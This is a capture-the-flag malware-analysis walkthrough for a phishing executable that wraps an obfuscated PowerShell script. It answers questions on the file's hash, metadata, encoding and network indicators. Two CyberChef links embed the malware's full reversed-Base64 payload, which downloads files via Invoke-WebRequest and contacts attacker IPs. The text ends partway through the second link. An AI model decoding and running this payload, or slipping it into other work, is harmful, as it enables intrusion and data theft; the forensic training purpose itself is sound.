Sherlock Scenario
Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary's capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.
Setting Up the Environment
First download the given file and unzip it. The password for the given file is hacktheblue
.
The zip file has a executable file named Superstar_MemberCard.tiff.exe
.
Task 1
Question
To accurately reference and identify the suspicious binary, please provide its SHA256 hash.
Solution
I used PeStudio
to get the SHA256 hash of the given executable. You can download PeStudio
from the following link: https://www.winitor.com/download .
Once you opened the given exeuctable in PeStudio
by going to File
-> Open
, you can find the SHA256 hash under the footprints
tab of PeStudio
.
Answer: 12DAA34111BB54B3DCBAD42305663E44E7E6C3842F015CCCBBE6564D9DFD3EA3
Task 2
Question
When was the binary file originally created, according to its metadata (UTC)?
Solution
You can find the creation date of the given executable under the file-header
tab of PeStudio
.
Make sure that you enter the answer in the following format: YYYY-MM-DD HH:MM:SS
.
Answer: 2024-03-13 10:38:06
Task 3
Question
Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?
Solution
Usually in a executable / PE file, the code is written under the .text
section. You can find the details of the .text
section of the given executable under the sections
tab of PeStudio
.
Answer: 38400
Task 4
Question
It appears that the binary may have undergone a file conversion process. Could you determine its original filename?
Solution
You can find the original file name before the conversion process under the resources
tab of the PeStudio
.
Answer: newILY.ps1
Task 5
Question
Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.
Solution
To identify the hexadecimal offset of the obfuscated code I used HxD
in my case. You can download HxD
from the following link: https://mh-nexus.de/en/hxd/ .
You can also get the hexadecimal offset of the obfuscated code from the location
column of the newILY.ps1
file under the resources
tab of the PeStudio
.
Set the number of bytes to show as 4
as shown in the above image to get the exact offset.
Answer: 2C74
Task 6
Question
The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?
Solution
I used FLOSS
to extract all the strings in the given executable. You can download FLOSS
from the following link: https://github.com/mandiant/flare-floss/releases/tag/v3.1.0 .
From the output of floss you can find the obfuscated code as shown in the following image.
The code is obfuscated using the Base64
algorithm and after obfuscation the code is reversed. I used to CyberChef
to reverse the above code and decoded the Base64
algorithm to the get the actual code.
You can use the following link to see the output in the above image in realtime.
Copy https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=PT1nQ05VMll5OW1SdEFTWnpKWGRqVm1VdEFpY3BSRWRsZG1jaFJISmdnR2RoQlZMZzBXWjBsVUxsWjNidFZtVUswUVpqSjNiRzFDSWxObmMxTldaUzFDSW9SWFlRUjNZaEpIZDRWMGRrQUNhMEZHVXRBU2JsUlhTdFVtZHYxV1pTcFFESzBRZkswUUtvUW1ibE5sTHRWR2RKeFdhaDFHSmdBQ0lnb1FEc3hXZHVSQ0krQVNLb3dHYkJWbWRzOTJjbEpsTHpSbmJsbEdjcE5XWlM1U2JsUlhTc2xXWXRSQ0lnQUNJSzBnQ04wSElnQUNJSzB3UURKRWJ2cGpPZFZHYzVSRmR1Vldhd2wyWWxKRmJwRldUczlrTHI5MmJzUlhkUDVDY3ZKWFowNVdTdVUyWXBabVpQNUNkbTkyY3ZKM1lwMTBXZzBESWxCWGVVNUNkdVZXYXdsMllsSjFZakpHSmdBQ0lnQUNJZ0FpQ05raUl6TlhaeVJHWkJCQ2JwRldiRkppTDBOV1kwNTJialJDS2tSV1F1TUhkdVZXYXdsMllsSmxMdFZHZEp4V2FoMUdKZzBESTA1V1pwQlhhalZtVWpObVlrQUNJZ0FDSWdBQ0lLMHdlZ2t5YzBOV1kwNTJialJDSXVsR0kwTldZMDUyYmpSQ0tnZzJZaFZtY3ZaR0lnQUNJSzBnQ05BaU1nMERJMEZXYnk5bVI1UjJiQzVTYmxSWFNzbFdZdFJDSWdBQ0lLMEFic1ZuYmtBaVBna3ladGxHSm9RR1pCNXljMDVXWnRoMlloUkhkQjVTYmxSWFNzbFdZdFJDSWdBQ0lLMFFlazltUXMxR2RvUkNJOUFTZWs5bVFzMUdkSTVTYmxSWFNzbFdZdFJDSWdBQ0lLMGdJdTRTWmpsR2R2NUdJc3gySjE5V2VnUVdaek4zYnlOR0l6SlhabjVXYUdKQ0k5QUNkalZtYWlWM1V1MFdaMGxFYnBGV2JrQUNJZ0FpQ05rQ01vMFdaMGxVWjBGV1p5TmtMcjkyYnNSWGR2UkNJOUFTYmxSWFNzbFdZdFJDSWdBQ0lLMEFhMEZHVWx4V2FHWjNjalJDSW9SWFlRMUNJMk4zUXRRbmN2QlhiSkJTUGdNSGRqRkdkdTkyWWtBQ0lnQWlDTm9RRHU5V2EwRldieTltWnVsVVp3bEhWdjVVTGdnR2RoQlZac2xtUjJOM1lrQUNhMEZHVXRBaWR6TlVMMEozYndoWFJnd0hJOUJDSWdBaUNOTUhjdkpIY2tBU2UwSlhadzltY1ExQ0kwTldacUoyVFRCRkkwTldacUoyVHRjWFpPQkNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQWlDTkFDSWdBQ0lnQUNJZ0FDSWdvUUR6TlhaeVJHWkJGRGJwRldiRjV5WGtBU1BnQXlKek5YWnlSR1pCQkNicEZXYkZkQ0lnQUNJZ0FDSWdBQ0lnQWlDTlVXYmg1RWJzVm5SdThGSmcwRElnQUNJZ0F5SmwxV1lPQkNic1ZuUm5BQ0lnQUNJZ0FDSWdBQ0lnb1FEN0JFSTlBeWN3OW1jd1JDSWdBQ0lnQUNJZ29RRDlCQ0lnQUNJZ0FDSUswQUlna0NNb1UyY3Z4MlF1OEZKZ0FDSWdBQ0lnQUNJZ0FDSUswd2VnUTNZbHBtWVAxQ2FqRldSeTltUmd3SEl5OUdkalZHY3o1V1MwVjJSdThGSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSThCeWN0VkdkSjVpY2xSR2J2WjBjME5XWTA1MmJqUkNJZ0FDSUswZ0kyTjNZdU1IZGpGR2R1OTJRY0pYYUVSWFpuSlhZMFJpSWcwRElvUlhZUVZHYnBaa2R6TkdKZ0FDSWdvUURna0NNeGdpY2xSR2J2WkVkc1ZYWW1WR1IwVjJSdVUyWWhCM2NsMVdZdVJDSTlBaWNsUkdidlowYzBOV1kwNTJialJDSWdBQ0lLMFFLaWtFVUIxa0lvVTJZaEIzY2wxV1lPUlhaSDV5YXY5R2IwVjNia0FTUGdVMlloQjNjbDFXWXVSQ0lnQUNJSzBnYnZsR2RoTldhc0JIY0I1eWF2OUdiMFYzVGdRM1lscG1ZUDEyYkQxQ0kwTldacUoyVHRjWFpPQlNQZ3MyYnZ4R2QxOUdKZ0FDSWdvUURvUlhZUXQyYnZ4R2QxOUdKZ2dHZGhCVlpzbG1SdEF5Y3pWMll2SkhVdFFuY2hSM1VnQUNJZ29RRDdCU0tvUlhZUXQyYnZ4R2QxOUdKb0FpWnBwUURLMEFRaW9RRCt3V2IwaDJMOG9RRCtrSFp2SjJMOG9RRCtBM0w4NGljbFJYWXNCU1p5VkdhMEJTZHZsSEluNVdhbFYyY2c0MmJnY21icFJuYjE5MlErQUhQSzBnUHc5Q1B1Y21idnhHSXY5R2RnY21icFJYYWhkSEl1RkdhMEJpY2xoR2RoSkhJeVZtYnY5MmNnUVhhZ0lXWXlkR0l2UkhJME5YWmlCeWNuUVhhZzgyY2d3Q2RwQkNaaDlHYnVkM2JrQmliaE5HSTE5V2VnVW1jdlpXWmlCQ2RwMVdhc0JTWnRsR2RnRUdJemRTWnlWR2EwQkNMd1ZISXpSV1lsaEdJNXhHWnVWV2F5WkdJaEJDZHpWblNnNGlQaDlDUGxKWFpvNXpKbGhYWnVZbVpwUm5Ma0pYWURKWFppMVdaTjlsY2hSM2N5VkdjMU4xTHdBRE01b0ROMEVqTDNnVE11WURNeTRDTjA4eUw2QUhkMGgySjlZV1p5aEdJaHhESWx4bVlwTjNjbE4yWWhCQ0w1SkhkdVZHSXk5bVpnUW1jaE5HSXdsR2F6SlhaaTFXWnRCQ2JoUlhhbmxHWmdFR0lrVldadUJDYnNkU2R2bEhJc2tuYzA1V1pnNFdhaGRHSXZSbFB3eGpDTjREY3Z3REl1VTJZdVZXYXVWbWR1OTJZZ0lYZHZsSEl5OW1aZ0FYWXRCU1pvUkhJa1ZHYWpGR2QwRkdJbFozSkpCaUw1UlhhMmwyYzF4Mlk0VkdJazVXWWdrM1loWlhheUJISW05R0kwbG1ZZ0VHSTU5bWF1VkdJdUYyWWdVMmRnVW1jbGgyZGd3aVkxeDJZZ0FYYW9ObmNsSldibDFHSWxSWFkybG1jd0JTWWdRWFlnTVhkdlpuZWxSbWJsSkhJaEJpY3ZaR0lrVjJadUZtY3lGR0lsWjNKSjVEYzhvUUQrQTNMODR5Y3lWM2JvQmljbFJuWmhCQ2MxQkNkbFZXYmc4R2RnTVhkZ0kzYm1CU1oyOUdiZ1EySkpCQ0wwbEdJdlJISXVWR2N2QlNaeWRTZHZsSEltbEdJczgyVWc0U1pzRkdkZ00zY2x4V1p0bEdkZ0VHSXQ5bWNtQlNadVYyWXpCU1lnVTJhcHhHSTA1V1p0OVdiZ2cyWWhWR0luNVdhb05YYXlWR2FqQkNMMzlHYnpCeWNuNVdhb1JISW41V2FyRkdkZ1kyYmdrSGQxRldaaUJTWm9SSEl1bEdJbFpYWnB4V1ppQlNTZ3d5WnVsR2EwbG5jbFpYWmdnMloxOW1jb1JISW9OWGR5QmlibFJuWnZCU1ozQlNaeVZHYTNCQ1pzSjNiM0JTWWc0V1MrQUhQSzBnUHc5Q1B1UVhZb1JISWxkbWJoaDJZZzhHZGdVV2JwUkhJemRDZHBCQ1psUldhalZHWmdVbWRua0VJMFZuWWd3U2VzVkdkaHhHSWwxR0l1VldaaUJ5Y25RWFlvUkZJL0FYWjBOSEkwaFhadUJTWm9SSElsdFdZMEJ5YjBCQ1psUlhZMGwyY2xoR0kwVm5ZZ3dpY2haV1lnMDJieVpHSWw1MmJsMTJiekJ5WnVsbWNwMUdaaEJpYmxWbVlnVW1kblUzYjVCaWJsaDJkZ2NtYnB4V1psWkdJMEZHYTBCeWR2NTJhZ1UzYlpCaUwxOVdlZ2dHZHBkSElsSlhZb05ISXZSSEluNVdhMDVXWTNCaWJsVm1ZZ1VtZG5rRUluNVdhb1JYWnQ5MmNnTTNKbEpYWm9SSElsTlhkaE5XWmlCQ2QxOUdJbjVXYW9OV1lsSkhJdGRTU2c0eWNwaEdkZ1VXWnpCU2R2bEhJdVZHYTNCQ2RoVm1jbkJ5WnVsMmJrQlNaeWRTZHZsSElsQjNiSUJpUHd4REkrQTNMOEFDTDVWR1MrQUhQSzBnUDVSMmJpeGpDTjREWmhWR2F2d2pDTjRUWnNsSGR6OUNQSzBRZmdBQ0lnb1FEN1lXYXlWMmN0TW5iaE5ISXNrbWNpbEdiaE5FSTZrSGJwMVdZbTFDZHU5bVpnQUNJZ29RRDdCU2VrOW1ZZ0FDSWdvUUQrVUdiNVIzYzhvUUQrUVdZbGhHUEswZ1BzMUdkb3hqQ040RGJ0UkhhZ1VFVVpSMVFQUlVJOG9RRGlBRUk5QVNlazltUXMxR2RvUmlDTm9RRGwxV1lPeEdiMVpFSTVSbmNsQjNieUJGWnVGR2M0VlVMZ0VESTBObmNwWlVMZ1EzWWxwbVlQMUNkalZHYmxORkk4QlNaekpYZGpWbVV0QWlJRmhWUnVzMFRQeEVWVjlrSWdJWFoweFdhRzFDSWlVMllwWm1aUEJDZG05MmN2SjNZcDFFWHpWR2JwWkVJdEZtY245bWNReGxPREpDSW9SWFlRMUNJdFZHZEpSR2JwaDJRdFFYWkhCU1BnQUNhMEZHVXI5MmJzUlhkdlJpQ05vUURLMHdkdlJtYnBkMWRsNTBiTzFDSTBsV1lYMUNJaUlDWW9SWFlRTkhKaUFXUDBCWGF5TjJjdklDSTBOWGFNUm5ibDFXZG5KWFF0QUNhMEZHVWxoWFIzUkNJb1JYWVFWR2JwWlVMZ00zY2xOMmJ5QlZMMEpYWTBObENOVTJZeTltUnRBQ2EwRkdVelJDSW9SWFlRVkdicFpVTGdVR2JwWlVMMFYzVGd3SElBSmlDTlFYYTRWbUNOVTJjdngyWUswZ0lnaEdkaEJWWjJsR2FqSlhZa0lDWWdRWGR3cFFEcTBUZWx0R2R6OUdhdEF5TDRNVE11WWpOdWtqTng0U056QTBJdEVEVEgxMmFMWlRhaE1rSjQwa09sTldhMkpYWno5eUw2QUhkbU5ISXVWR2N2cFFEaUFrQ05JQ2Q0Um5MMEJYYXlOMlVsTm1iaDVXWjA1V2FoMUdYb1JYWVFSM1loSkhkNFYwZGtJQ0k5QUNhMEZHVXpSaUNOSVNidk5tTFFOMFV1bDJWY2hHZGhCRmRqRm1jMGhYUjNSaUlnMERJb1JYWVFWR2VGZEhKSzBnQ05VMll5OW1SdEFDYTBGR1UwTldZeVJIZUZkSEpnZ0dkaEJsYnZsR2RoNVdhME5YWkUxQ0lseFdhR0JYYWFkSEpnZ0dkaEJWTGdVbWRwaDJZeUZVTGs1V1l3aFhSSzB3WnVsMmN5RkdVamwyY2hKVVp6VlZMZ1VHYnBaRWNwcDFka0FTWnNsbVIwVjNUdEFDYnlWRmNwcDFka0FTYXlWVkxnSUNkbGQyVmlBQ2R1VjJaQkpYWnpWVkxnUTNjbFZYY2xKbFlsZFZMbHQyYjI1V1NLMGdDTkl5Y3M5MmJVMXlhelZHUnd4V1pJeDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJb1JYWVFSM1loSkhkNFYwZGtvUURpQVhhNjVDVURObGJwZEZYeWxHUjBWMlp5Rkdka0lDSTlBU1pzbG1Sd2xtVzNSaUNOSUNjcHBuTHQ5Mll0SVhZa0ZtYzBaMmJ6OVZac0pXWTBKM2J3MUNjak5uYnBkM0x3OGljME5YYWs5U1pzSldZMEozYncxQ2NqTm5icGQzTHpSM1kxUjJieUIzTGpsR2RoUjNjdjAyYmo1aWNoUldZeVJuWnZObkx6VjNMdm96Y3dSSGRvSkNJOUFDYnlWRmNwcDFka29RREswQUlsTm1jdlpVTGdnR2RoQlZaMmxHYWpKWFlrQUNhMEZHVXU5V2EwRm1icFIzY2xSVUxnSVhhRVJYWm5KWFkwUkNJb1JYWVExQ0lsWlhhb05tY0IxeWN6Vm1jdzEyYkRwUURpQVhhNjVTWnRGbWIwTjNib1JDWHlsR1IwVjJaeUZHZGtJQ0k5QUNhMEZHVWxaWGFvTm1jaFJpQ05jU1oxNVdhMDUyYkRsSGIwNVdac2wyVW5BU1BnVTJZdVZtY2xaV1p5QjFjelZtY245bWNRUmlDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhUWQwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJpY3ZBQ2RzVjNjbEpIY25wUURsTm1jdlpVTGdreUowaEhkdThtWnVsV1p5RkdhVGRDSXlsR1IwVjJaeUZHZGtBQ2EwRkdVdDRXYXZwRUtnZ0dkaEJWWnNsbVJ0QVNac2xtUnRRWGRQQkNmZ1VtY2hoMlVpMTJVdFFYWkhwUURLMFFmZ0FDSWdvUUQ5QkNJZ0FDSWdBQ0lLMFFaakozYkcxQ0lvUlhZUTUyYnBSWFl1bEdkelZHWmtBaWJ2bEdkaDVXYTBOWFpFMUNJbDFXWU94R2IxWmtMZlJDSW9SWFlRMUNJdFZHZEoxU2V3OTJRZ0FDSWdBQ0lnQUNJZ0FDSUswd2Vna0NhMEZHVXU5V2EwRm1icFIzY2xSR0pnVW1idEFTWnRGbVRzeFdkRzV5WGtnQ0ltbEdJZ0FDSWdBQ0lnb1FEZ0FDSWdBQ0lnQWlDTlVXYmg1a0xmUkNJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFSTlBQ2EwRkdVdTlXYTBGbWJwUjNjbFJHSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSWdBQ0lLMEFmZ2NTWjE1V2EwNTJiRGxIYjA1V1pzbDJVbkFpYnZsR2RqRmtjdkpuY0YxQ0lsTm1jdlpVTGdRM2NweEVkNFZHSmdVR1oxeDJZdWxVTGdVMmN5VjNZbEpWTGdJWGFFaDJZeUZXWnpSQ0l0VkdkSlJHYnBoMlF0UVhaSEJTUGd3R2IxNUdKSzBBSWdBQ0lnQUNJZ0FDSWdBQ0lLMGdJME4zYnVvaUlnd2lJblIyYnVvaUlnd2lJd1IyYnVvaUlnd2lJelIyYnVvaUlnd2lJMFIyYnVvaUlnQUNMaVEzY3c1aUtpQUNMaXdXYmw1aUtpQUNMaWMyY3Q1aUtpQUNMaWdIZHZSbUxxSUNJc0lDZTB4R2V1b2lJZ0FDSWdBQ0lnQUNJZ0FDSUswQUlzSUNlMDlHY3VvaUlnd2lJMFoyYnE0aUlnd2lJMk4zWXVvaUlnd2lJbVJHY3VvaUlnd2lJNFJIY3c1aUtpQUNMaVFIY3c1aUtpQUNMaWczY3NobkxxSUNJc0l5Y3NobkxxSUNJc0lDZWo5R1p1b2lJZ3dpSWo5R1p1b2lJZ0FTUGdRM2NweEVkNFZHSkswZ0NOMG5DTlVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdVMll5OW1SdEF5YXY5R2IwVjNUZ1VXYmg1VUxnTTNjbE4yYnlCVkx3OUdkVEJDSWdBaUNOc0hJcFVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdzMmJ2eEdkMTlFSWwxV1lPMUNJek5YWmo5bWNRMUNkbGRFS2dZV2FLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWNsTjNjbE4yYnlCbGNsTlhWbkFpY3BSRWRsZG1jaFJISmdnR2RoQlZMdWwyYktoQ0lvUlhZUVZHYnBaVUxnVUdicFpVTDBWM1Rnd0hJa2wwY3pWMll2SkhVZ3dTWnRGbVR6TlhaajltY1FCQ2RqVm1haTlVTDBOV1pzVjJVZ3dISXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTjBuQ04wSElnQUNJSzBBSWdVMmNzRm1aa0FDSWdBQ0lnQUNJSzB3ZWdnMlkwRjJZZzBISWdBQ0lLMGdjbE5YVjA1V1p5SlhkalJDSXhWV0xnSVhaelZsTHBnaWNsNTJkUFJYWkg1eVhrQUNJZ0FDSWdBQ0lLMHdlZ2tuYzBCQ0lnQWlDTnNISTBOV1pxSjJUdFVtY2xoMlZnd0hJek5YWmo5bWNROWxNejRXYVhCQ2RqVm1haTlVYXRkVkwwVjJSZzBESXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhV0YwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJDYnNWbmJrNGpNZ1VXZHNGbWR2QUNWRmRFSTBOV2RrOW1jUU5YZHlsbVZwUm5iQkJDU1VGRVVnSWpjbFJuYmxOVWUwbG1jMU5XWlR4RmR2OW1jY3hsT0ZOVVFRTlZSTkZrVHZBeVlwMTJkSzBRWmpKM2JHMUNJcGNDZDRSbkx6SlhaelZIYmhOMmJzZENJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFS2dnR2RoQlZac2xtUnRBU1pzbG1SdFFYZFBCQ2ZnUW5iMTkyWWpGa2NsTlhWZkp6TXVsMlZnTTNjaHgyUXRBQ2RqVm1haTlVYXRkVkwwVjJSSzBRWmpKM2JHMUNJcGNDZDRSbkx2Wm1icE5FUm5BaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTHVsMmJLaENJb1JYWVFWR2JwWlVMZ1VHYnBaVUwwVjNUZ3dISXN4V2R1UmlQeUFpVEpGVVRQUmtVRk5WVjZZbmJsUmlPalJHZGxkMmNrOUNJME5YWjB4bWJLMGdDTlUyWXk5bVJ0QVNLblFIZTA1U1p0Rm1ieVYyYzFkQ0l5bEdSMFYyWnlGR2RrQUNhMEZHVXQ0V2F2cEVLZ2dHZGhCVlpzbG1SdEFTWnNsbVJ0UVhkUEJDZmdJWFp6VkZkdVZtY3lWM1lrb1FESzBRZkswQWJzVm5UdFFYZFBCQ2ZnVTJZeTltUnRBaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTGdrbmN2UjNZbEpYYUVCU1p3bEhWdFZHZEoxQ0l0VkdkSjF5ZGw1RUlnQUNJSzB3ZWdrU0t5Vm1icEZHZHU5MlFnVUdjNVJGYTBGR1V0QWljcFJFZGxkbWNoUkhKZ2dHZGhCVkxnZ0dkaEJWTDBOWFpVaENJMDltYnRnQ0ltbG1DTm9RRGlNWFpzbG1SZ01XYXNKV2RReDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJeWxHUjBWMlp5Rkdka29RRGlNbmNsTlhWY3B6UWlBU1BnSVhhRWgyWXlGV1p6UmlDTm9RRG4xV2FrQXljelYyWXZKSFV0UW5jaFIzVUswd1p0bEdKZ1VHYnBaRWQxOVVMZ3dtYzFSQ0lwSlhWdEFDZHpWV2R4Vm1VaVYyVnRVMmF2Wm5iSnBRREswZ0ltWldhMDVDWnlGMlF5Vm1ZdFZXVGZKWFkwTm5jbEJYZFR4MWNrRjJiczUyZHZSRVh5VjJjVlJuYmxKbmMxTkdKY05uY2xOWGRjcHpRaUFTUGdjV2JwUmlDTklpWm1sR2R1UW1jaE5rY2xKV2JsMTBYeUZHZHpKWFp3VjNVdkFETXdrak8wUVRNdWNET3g0aU53SWpMMFF6THZvRGMwUkhhaUFTUGd3bWMxUmlDTlVVVEI1a1VGTlZWNlluYmxSQ0k5QWljbE5YVjA1V1p5SlhkalJpQ05VVVRCNWtVRlJWVlExMFREcGpkdVZHSmcwRElsMVdZdVIzY3ZoR0o&oeol=CRLF
Answer: Base64
Task 7
Question
What is the specific cmdlet utilized that was used to initiate file downloads?
Solution
You can find the cmdlet used in the decoded version of the obfuscated code as shown in the following image.
Answer: Invoke-WebRequest
Task 8
Question
Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.
Solution
You can filter the IP address and sort them as shown in the following image using CyberChef
.
You can use the following link to see the output in the above image in realtime.
Copy https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)Extract_IP_addresses(true,false,false,false,true,true)&input=PT1nQ05VMll5OW1SdEFTWnpKWGRqVm1VdEFpY3BSRWRsZG1jaFJISmdnR2RoQlZMZzBXWjBsVUxsWjNidFZtVUswUVpqSjNiRzFDSWxObmMxTldaUzFDSW9SWFlRUjNZaEpIZDRWMGRrQUNhMEZHVXRBU2JsUlhTdFVtZHYxV1pTcFFESzBRZkswUUtvUW1ibE5sTHRWR2RKeFdhaDFHSmdBQ0lnb1FEc3hXZHVSQ0krQVNLb3dHYkJWbWRzOTJjbEpsTHpSbmJsbEdjcE5XWlM1U2JsUlhTc2xXWXRSQ0lnQUNJSzBnQ04wSElnQUNJSzB3UURKRWJ2cGpPZFZHYzVSRmR1Vldhd2wyWWxKRmJwRldUczlrTHI5MmJzUlhkUDVDY3ZKWFowNVdTdVUyWXBabVpQNUNkbTkyY3ZKM1lwMTBXZzBESWxCWGVVNUNkdVZXYXdsMllsSjFZakpHSmdBQ0lnQUNJZ0FpQ05raUl6TlhaeVJHWkJCQ2JwRldiRkppTDBOV1kwNTJialJDS2tSV1F1TUhkdVZXYXdsMllsSmxMdFZHZEp4V2FoMUdKZzBESTA1V1pwQlhhalZtVWpObVlrQUNJZ0FDSWdBQ0lLMHdlZ2t5YzBOV1kwNTJialJDSXVsR0kwTldZMDUyYmpSQ0tnZzJZaFZtY3ZaR0lnQUNJSzBnQ05BaU1nMERJMEZXYnk5bVI1UjJiQzVTYmxSWFNzbFdZdFJDSWdBQ0lLMEFic1ZuYmtBaVBna3ladGxHSm9RR1pCNXljMDVXWnRoMlloUkhkQjVTYmxSWFNzbFdZdFJDSWdBQ0lLMFFlazltUXMxR2RvUkNJOUFTZWs5bVFzMUdkSTVTYmxSWFNzbFdZdFJDSWdBQ0lLMGdJdTRTWmpsR2R2NUdJc3gySjE5V2VnUVdaek4zYnlOR0l6SlhabjVXYUdKQ0k5QUNkalZtYWlWM1V1MFdaMGxFYnBGV2JrQUNJZ0FpQ05rQ01vMFdaMGxVWjBGV1p5TmtMcjkyYnNSWGR2UkNJOUFTYmxSWFNzbFdZdFJDSWdBQ0lLMEFhMEZHVWx4V2FHWjNjalJDSW9SWFlRMUNJMk4zUXRRbmN2QlhiSkJTUGdNSGRqRkdkdTkyWWtBQ0lnQWlDTm9RRHU5V2EwRldieTltWnVsVVp3bEhWdjVVTGdnR2RoQlZac2xtUjJOM1lrQUNhMEZHVXRBaWR6TlVMMEozYndoWFJnd0hJOUJDSWdBaUNOTUhjdkpIY2tBU2UwSlhadzltY1ExQ0kwTldacUoyVFRCRkkwTldacUoyVHRjWFpPQkNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQWlDTkFDSWdBQ0lnQUNJZ0FDSWdvUUR6TlhaeVJHWkJGRGJwRldiRjV5WGtBU1BnQXlKek5YWnlSR1pCQkNicEZXYkZkQ0lnQUNJZ0FDSWdBQ0lnQWlDTlVXYmg1RWJzVm5SdThGSmcwRElnQUNJZ0F5SmwxV1lPQkNic1ZuUm5BQ0lnQUNJZ0FDSWdBQ0lnb1FEN0JFSTlBeWN3OW1jd1JDSWdBQ0lnQUNJZ29RRDlCQ0lnQUNJZ0FDSUswQUlna0NNb1UyY3Z4MlF1OEZKZ0FDSWdBQ0lnQUNJZ0FDSUswd2VnUTNZbHBtWVAxQ2FqRldSeTltUmd3SEl5OUdkalZHY3o1V1MwVjJSdThGSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSThCeWN0VkdkSjVpY2xSR2J2WjBjME5XWTA1MmJqUkNJZ0FDSUswZ0kyTjNZdU1IZGpGR2R1OTJRY0pYYUVSWFpuSlhZMFJpSWcwRElvUlhZUVZHYnBaa2R6TkdKZ0FDSWdvUURna0NNeGdpY2xSR2J2WkVkc1ZYWW1WR1IwVjJSdVUyWWhCM2NsMVdZdVJDSTlBaWNsUkdidlowYzBOV1kwNTJialJDSWdBQ0lLMFFLaWtFVUIxa0lvVTJZaEIzY2wxV1lPUlhaSDV5YXY5R2IwVjNia0FTUGdVMlloQjNjbDFXWXVSQ0lnQUNJSzBnYnZsR2RoTldhc0JIY0I1eWF2OUdiMFYzVGdRM1lscG1ZUDEyYkQxQ0kwTldacUoyVHRjWFpPQlNQZ3MyYnZ4R2QxOUdKZ0FDSWdvUURvUlhZUXQyYnZ4R2QxOUdKZ2dHZGhCVlpzbG1SdEF5Y3pWMll2SkhVdFFuY2hSM1VnQUNJZ29RRDdCU0tvUlhZUXQyYnZ4R2QxOUdKb0FpWnBwUURLMEFRaW9RRCt3V2IwaDJMOG9RRCtrSFp2SjJMOG9RRCtBM0w4NGljbFJYWXNCU1p5VkdhMEJTZHZsSEluNVdhbFYyY2c0MmJnY21icFJuYjE5MlErQUhQSzBnUHc5Q1B1Y21idnhHSXY5R2RnY21icFJYYWhkSEl1RkdhMEJpY2xoR2RoSkhJeVZtYnY5MmNnUVhhZ0lXWXlkR0l2UkhJME5YWmlCeWNuUVhhZzgyY2d3Q2RwQkNaaDlHYnVkM2JrQmliaE5HSTE5V2VnVW1jdlpXWmlCQ2RwMVdhc0JTWnRsR2RnRUdJemRTWnlWR2EwQkNMd1ZISXpSV1lsaEdJNXhHWnVWV2F5WkdJaEJDZHpWblNnNGlQaDlDUGxKWFpvNXpKbGhYWnVZbVpwUm5Ma0pYWURKWFppMVdaTjlsY2hSM2N5VkdjMU4xTHdBRE01b0ROMEVqTDNnVE11WURNeTRDTjA4eUw2QUhkMGgySjlZV1p5aEdJaHhESWx4bVlwTjNjbE4yWWhCQ0w1SkhkdVZHSXk5bVpnUW1jaE5HSXdsR2F6SlhaaTFXWnRCQ2JoUlhhbmxHWmdFR0lrVldadUJDYnNkU2R2bEhJc2tuYzA1V1pnNFdhaGRHSXZSbFB3eGpDTjREY3Z3REl1VTJZdVZXYXVWbWR1OTJZZ0lYZHZsSEl5OW1aZ0FYWXRCU1pvUkhJa1ZHYWpGR2QwRkdJbFozSkpCaUw1UlhhMmwyYzF4Mlk0VkdJazVXWWdrM1loWlhheUJISW05R0kwbG1ZZ0VHSTU5bWF1VkdJdUYyWWdVMmRnVW1jbGgyZGd3aVkxeDJZZ0FYYW9ObmNsSldibDFHSWxSWFkybG1jd0JTWWdRWFlnTVhkdlpuZWxSbWJsSkhJaEJpY3ZaR0lrVjJadUZtY3lGR0lsWjNKSjVEYzhvUUQrQTNMODR5Y3lWM2JvQmljbFJuWmhCQ2MxQkNkbFZXYmc4R2RnTVhkZ0kzYm1CU1oyOUdiZ1EySkpCQ0wwbEdJdlJISXVWR2N2QlNaeWRTZHZsSEltbEdJczgyVWc0U1pzRkdkZ00zY2x4V1p0bEdkZ0VHSXQ5bWNtQlNadVYyWXpCU1lnVTJhcHhHSTA1V1p0OVdiZ2cyWWhWR0luNVdhb05YYXlWR2FqQkNMMzlHYnpCeWNuNVdhb1JISW41V2FyRkdkZ1kyYmdrSGQxRldaaUJTWm9SSEl1bEdJbFpYWnB4V1ppQlNTZ3d5WnVsR2EwbG5jbFpYWmdnMloxOW1jb1JISW9OWGR5QmlibFJuWnZCU1ozQlNaeVZHYTNCQ1pzSj